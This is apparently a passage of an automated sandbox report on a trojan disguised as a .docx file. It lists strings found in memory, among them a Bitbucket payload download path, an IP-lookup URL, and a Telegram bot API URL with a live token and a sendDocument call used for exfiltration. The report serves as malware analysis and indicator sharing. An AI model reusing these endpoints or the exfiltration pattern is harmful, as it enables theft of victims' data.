          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.P
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/p
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2278122938.0000000021A1C000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2232552355.000000007F11A000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2278647892.0000000021AF0000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2278122938.0000000021A1C000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2232552355.000000007F11A000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2278647892.0000000021AF0000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif.0.drString found in binary or memory: http://ocsp.comodoca.com0$
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2278122938.0000000021A1C000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2232552355.000000007F11A000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2278647892.0000000021AF0000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif.0.drString found in binary or memory: http://www.pmail.com0
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D42D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D423000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D547000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: xzeheenC.pif, 00000004.00000002.3468357631.000000001D2F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D393000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D56A000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D547000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D37F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468357631.000000001D3F5000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471546461.000000003461A000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E4B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: xzeheenC.pif, 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2236856476.00000000007B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/)_
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.000000002090D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/dow
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.000000002089B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227349733.000000000082D000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227422959.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
          Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
          Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
          Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
          Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
          Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
          Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
          Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
